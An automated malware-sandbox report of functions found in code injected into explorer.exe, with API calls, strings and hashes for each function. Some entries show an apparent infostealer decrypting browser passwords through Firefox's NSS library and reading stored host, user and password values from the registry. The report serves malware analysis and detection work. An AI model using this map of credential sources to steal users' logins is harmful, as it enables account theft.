                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                        • API String ID: 3366569387-3272982511
                                                                                                        • Opcode ID: 58ee3e820e58c205d1750ed955bd41ef1e02932b8a9151f7ac5215a230c1adda
                                                                                                        • Instruction ID: d7762332dc1a418efa0f87761eb38427c8cab62acc5292b109dddf3ae7b35fb6
                                                                                                        • Opcode Fuzzy Hash: 58ee3e820e58c205d1750ed955bd41ef1e02932b8a9151f7ac5215a230c1adda
                                                                                                        • Instruction Fuzzy Hash: 4C416839A02311EFCF1CFF75995066E7AE99BCE646708083FDA41D7605DB788C458B60
                                                                                                        Function 030F5E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F5BF5: memset.NTDLL ref: 030F5C07
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F60E1
                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030F60EC
                                                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 030F6113
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F618E
                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030F61B5
                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030F61C1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _alldiv$_allrem$memset
                                                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                        • API String ID: 2557048445-1989508764
                                                                                                        • Opcode ID: 1e4918b4fff74224fe84481b75be2956dfabddcb65cf70081fd47eaf55b9b825
                                                                                                        • Instruction ID: 2a16eb7e12281588f7d576a7eabeaad625f48c6a8f74f11043bd55b9e7a9bb5d
                                                                                                        • Opcode Fuzzy Hash: 1e4918b4fff74224fe84481b75be2956dfabddcb65cf70081fd47eaf55b9b825
                                                                                                        • Instruction Fuzzy Hash: 4AB1C2B1909346AFD375DE24CC84B3FBFD4FB86304F1C0989F682AAAC1E726C5148695
                                                                                                        Function 0310D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcmp.NTDLL(0314637A,BINARY,00000007), ref: 0310D324
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                        • API String ID: 1475443563-3683840195
                                                                                                        • Opcode ID: 494993f81b0fab32eb52a30b2a66ce5de7eca0fc7e967854b3eb95e24e5c6ac9
                                                                                                        • Instruction ID: d17a55bb50dbabebb47aacdadc4dcfddf838b60d163c843d9d09ad114b1001ba
                                                                                                        • Opcode Fuzzy Hash: 494993f81b0fab32eb52a30b2a66ce5de7eca0fc7e967854b3eb95e24e5c6ac9
                                                                                                        • Instruction Fuzzy Hash: 6451F471504300AFC724DFA4EC40A6AF7A5AF4D600F094859F9A59F681E3B1E849CB92
                                                                                                        Function 030F48B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F4845
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F488F
                                                                                                          • Part of subcall function 030F482C: lstrlenW.KERNEL32(?), ref: 030F4897
                                                                                                        • wsprintfW.USER32 ref: 030F49A7
                                                                                                        • wsprintfW.USER32 ref: 030F49B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                        • API String ID: 2889301010-4273187114
                                                                                                        • Opcode ID: c555c74cb7f685d9c5d6b76193dcad7256246b7c36e250f325e03abd2b6e273e
                                                                                                        • Instruction ID: 5f932d90beeaadcfc8da04c2cfa7dcd1d5a7eac2ad1cecb05dffe67215cdcedf
                                                                                                        • Opcode Fuzzy Hash: c555c74cb7f685d9c5d6b76193dcad7256246b7c36e250f325e03abd2b6e273e
                                                                                                        • Instruction Fuzzy Hash: 6C31243870E3049FC714EB66C85082FF6EDEFCA648B09491DBA4587640DBB2DC0187E1
                                                                                                        Function 030FF92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 030FFB32
                                                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 030FFB4D
                                                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 030FFB60
                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 030FFB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                        • API String ID: 3510742995-3408036318
                                                                                                        • Opcode ID: 3325d5f12cae4795ed257d813e595a9be1eefc4c75fe8bc0d343900c32e33bc9
                                                                                                        • Instruction ID: a2d04279c5326664957aa82f1100c67f9774fbf2186cbd6b29dcabc3a909fa4c
                                                                                                        • Opcode Fuzzy Hash: 3325d5f12cae4795ed257d813e595a9be1eefc4c75fe8bc0d343900c32e33bc9
                                                                                                        • Instruction Fuzzy Hash: AED1E6B56093418FC714DF28C880B6ABBE5AF85314F0C466DEE998F791E775D804CB52
                                                                                                        Function 030F7820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %$-x0$NaN
                                                                                                        • API String ID: 0-62881354
                                                                                                        • Opcode ID: b6c7e2fe1b33ad7f6cf197b29fe2274f5a1b374ec748cf3a8cc2f422461a929d
                                                                                                        • Instruction ID: 630b2494556ed739a6cefdbed33539f4c0c1a68d010ac1f839aab41ca20ea718
                                                                                                        • Opcode Fuzzy Hash: b6c7e2fe1b33ad7f6cf197b29fe2274f5a1b374ec748cf3a8cc2f422461a929d
                                                                                                        • Instruction Fuzzy Hash: 62D1243060E3828FD765CE28849076EFBE5AFCAA84F18499DEAC187B41D665C945C783
                                                                                                        Function 030F78B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        • Opcode ID: 229d433f66754a9b50c0a2a17dafbfa01ac088a981050e8fb6b8b8826505152c
                                                                                                        • Instruction ID: 37876c08e51d60e2b96582c1156c70346f6aa60a82101e448b53269dc2517638
                                                                                                        • Opcode Fuzzy Hash: 229d433f66754a9b50c0a2a17dafbfa01ac088a981050e8fb6b8b8826505152c
                                                                                                        • Instruction Fuzzy Hash: 61E14530A0E3828FD765CE28845076FFBE5AFCAA84F1C499DEAC187B41D665C945C783
                                                                                                        Function 030F7A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        • Opcode ID: c8415d3900cce079093fa86c097ad559dde052c1703d1ff400bf4255187105cc
                                                                                                        • Instruction ID: f63f3b587ed9134aef5bf81eb09131f97440c536bca7c2a70bf215c5d95bf718
                                                                                                        • Opcode Fuzzy Hash: c8415d3900cce079093fa86c097ad559dde052c1703d1ff400bf4255187105cc
                                                                                                        • Instruction Fuzzy Hash: 74E1243460A3818FD765CE28C49076EFBE5AFCAA84F18489DFAC18BB41D675C845C793
                                                                                                        Function 030F7A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        • Opcode ID: f613c846f1789d2fa18873e40e208ec8ed294265fa366418b207cf56183660ff
                                                                                                        • Instruction ID: 682a95d6c049c34c0904566e14b572569da1f4fab467bbfec33a14e543bf2d41
                                                                                                        • Opcode Fuzzy Hash: f613c846f1789d2fa18873e40e208ec8ed294265fa366418b207cf56183660ff
                                                                                                        • Instruction Fuzzy Hash: 28E1233060A3828FD765CE28C49076EFBE5AFCAA84F1C499DEAC187B41D675C945C783
                                                                                                        Function 030F77F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        • Opcode ID: 6568997f88826adab7ee50240011d87122979838190d7f22b7c5e6638a768c02
                                                                                                        • Instruction ID: f186bc36e6b047fa7f22ff68054d67ffab44344b835255761f5e29a2da6bfedb
                                                                                                        • Opcode Fuzzy Hash: 6568997f88826adab7ee50240011d87122979838190d7f22b7c5e6638a768c02
                                                                                                        • Instruction Fuzzy Hash: F6E12330A0E3829FD765CE28C49076EFBE5AFCAA84F18489DFAC187B41D665C945C743
                                                                                                        Function 030F70C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 030F720E
                                                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 030F7226
                                                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 030F727B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _aulldvrm$_aullrem
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 105165338-3447725786
                                                                                                        • Opcode ID: 997388096c3d5e26b22532b1c7313c40a05c139f57178c8e6ec21b6b00fb1880
                                                                                                        • Instruction ID: 7cfc39b14edfa01052e0c9b08a50f598dc807f4aa053b3b330e4293ceec50239
                                                                                                        • Opcode Fuzzy Hash: 997388096c3d5e26b22532b1c7313c40a05c139f57178c8e6ec21b6b00fb1880
                                                                                                        • Instruction Fuzzy Hash: 47D1133060E3829FD765CE28849076EFBE5AFCAA84F1C489DFAC187B41D665C945C783
                                                                                                        Function 030F898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 030F8AAD
                                                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 030F8B66
                                                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 030F8C9B
                                                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 030F8CAE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _allmul$_alldvrm
                                                                                                        • String ID: .
                                                                                                        • API String ID: 115548886-248832578
                                                                                                        • Opcode ID: ea8b97e071eaca1eff1f6dfb79445cc1552b78749911abee25210967d709f59f
                                                                                                        • Instruction ID: c7289e8ca8546011fc4bc8ddaab6059fb28121e8dd628c1a599968a740247048
                                                                                                        • Opcode Fuzzy Hash: ea8b97e071eaca1eff1f6dfb79445cc1552b78749911abee25210967d709f59f
                                                                                                        • Instruction Fuzzy Hash: 5BD1D3B290E7858FC714DF5888802AEBBE5FFC5314F088D9EF7D556A80E3B189458786
                                                                                                        Function 0311D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ,$7$9
                                                                                                        • API String ID: 2221118986-1653249994
                                                                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                        • Instruction ID: 0c0dfb31cf008328222819491f923f39dc5b6e56d67e60a0b93cd7303ceb4ccb
                                                                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                        • Instruction Fuzzy Hash: B3318F725083449FD330DF60D480BDFBBE9AF89344F00492EE9899B251EB719548CBA3
                                                                                                        Function 030F1BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BCC
                                                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BF0
                                                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C05
                                                                                                        • lstrlenW.KERNEL32(00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C1C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID: .exe
                                                                                                        • API String ID: 1659193697-4119554291
                                                                                                        • Opcode ID: 3343c6690edb6ecf8cea1ec74778abed79c3fc08a82d71be3c01bc5257330794
                                                                                                        • Instruction ID: 0138723694d269adb70e18cde7e16b11c173e74695a7863d5cbeb3a8e8a0f8fe
                                                                                                        • Opcode Fuzzy Hash: 3343c6690edb6ecf8cea1ec74778abed79c3fc08a82d71be3c01bc5257330794
                                                                                                        • Instruction Fuzzy Hash: 6EF0C234312320DFD36CEF34AC45ABF62E5EF4A741718482EE282C7155EB608881C7A9
                                                                                                        Function 030F2112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 030F2127
                                                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 030F213A
                                                                                                        • wsprintfA.USER32 ref: 030F214F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                        • String ID: %li
                                                                                                        • API String ID: 4120667308-1021419598
                                                                                                        • Opcode ID: 5425d1e8409f8694368b1ea6c500202a931d9e2d58b74a0862535dbc8f91b6d5
                                                                                                        • Instruction ID: 6f2fa7f8d196beedb6852ba36e486f73eb2f213af19b7bece30b7ad195b51a7f
                                                                                                        • Opcode Fuzzy Hash: 5425d1e8409f8694368b1ea6c500202a931d9e2d58b74a0862535dbc8f91b6d5
                                                                                                        • Instruction Fuzzy Hash: 5EE0D13654130477C7147BB49C05FEF7B6CDB45A55F040191F504E5149D6724A1483D5
                                                                                                        Function 03102FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 0310316F
                                                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 031031D2
                                                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 031032DE
                                                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 031032E7
                                                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 03103392
                                                                                                          • Part of subcall function 031016CD: memset.NTDLL ref: 0310172B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _allmul$_alldivmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3880648599-0
                                                                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                        • Instruction ID: fda7806538f7fa83204d29641d915ab4a811c8e2fbdb9de89436d0d78c9cd8e5
                                                                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                        • Instruction Fuzzy Hash: CED18C796083419FDB24DF69C480B6EB7E5AF8C704F084D2DF9A59B290DBB0D845CB92
                                                                                                        Function 031287FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                        • API String ID: 0-384346570
                                                                                                        • Opcode ID: bd9361bad644a2102be7996b4e9383caefc5f701744d05a1ec414d3ae26efdb4
                                                                                                        • Instruction ID: bdd88e7cafb010d849661e743379c57873bcc4c9f4e50dd7ad068b346a5c0b1f
                                                                                                        • Opcode Fuzzy Hash: bd9361bad644a2102be7996b4e9383caefc5f701744d05a1ec414d3ae26efdb4
                                                                                                        • Instruction Fuzzy Hash: 8DD117746083109FD714DF25C880B6FBBEAAFC8754F14892EF9458B290DB74D962CB92
                                                                                                        Function 030F96BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 030F96E7
                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 030F9707
                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 030F9739
                                                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 030F976C
                                                                                                        • _allmul.NTDLL(?,?,?,?), ref: 030F9798
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _alldiv$_allmul
                                                                                                        • String ID:
                                                                                                        • API String ID: 4215241517-0
                                                                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                        • Instruction ID: f73f516de98ce030a8a172901cce63d3a96f2ee46a0d135d8856d9fcf251a395
                                                                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                        • Instruction Fuzzy Hash: 9D21EF3AA0B3552FD774DD1B5CC0B6BBACDCBD57A4F2D052EEB018AE50FB52880081A1
                                                                                                        Function 0310B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 0310B1B3
                                                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 0310B20F
                                                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 0310B28A
                                                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0310B298
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1484705121-0
                                                                                                        • Opcode ID: 8bb5ef7ee9f947890151d952152cd34c7c221b96223e7c7f80298b2e18ba3162
                                                                                                        • Instruction ID: 03789c6259646c3e000f8b020875151300511d71ca31d81d5002d81e9aa371df
                                                                                                        • Opcode Fuzzy Hash: 8bb5ef7ee9f947890151d952152cd34c7c221b96223e7c7f80298b2e18ba3162
                                                                                                        • Instruction Fuzzy Hash: EC4107756083419FC718EF25C890A2AF7E6BFCD200F04892DF9959B291DB71EC05CB92
                                                                                                        Function 030F1895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 030F18A7
                                                                                                        • GlobalLock.KERNEL32(030F4B57), ref: 030F18B6
                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 030F18F4
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030F18E8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1688112647-0
                                                                                                        • Opcode ID: 81964d813b991a063bfac6bdd8a8d0396271b5323c1c4474b7767403fe1351bd
                                                                                                        • Instruction ID: e0ce5393318416408cf8b5712a026b33bc9ea07ccee4050f8841b62fa21fe6c5
                                                                                                        • Opcode Fuzzy Hash: 81964d813b991a063bfac6bdd8a8d0396271b5323c1c4474b7767403fe1351bd
                                                                                                        • Instruction Fuzzy Hash: 0501AD79202306EF8B09AF25980889FBBE9EFC9251B04842EFA4587610DF36C8058B20
                                                                                                        Function 030F1953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                        • lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                        • lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1475610065-0
                                                                                                        • Opcode ID: d4982b0fedacb0968a10ae810ccc6fd45e7bebad1663e127f3a1e3434708dfeb
                                                                                                        • Instruction ID: b6087aded0b1e5d243c45be7a33f4a971ccca536fa2bc1a56a8725a13960c26a
                                                                                                        • Opcode Fuzzy Hash: d4982b0fedacb0968a10ae810ccc6fd45e7bebad1663e127f3a1e3434708dfeb
                                                                                                        • Instruction Fuzzy Hash: 95E065A630521C5F8718B6AE5C94D7B76DCCACD5A53090079FB09D3205FB569C0546F0
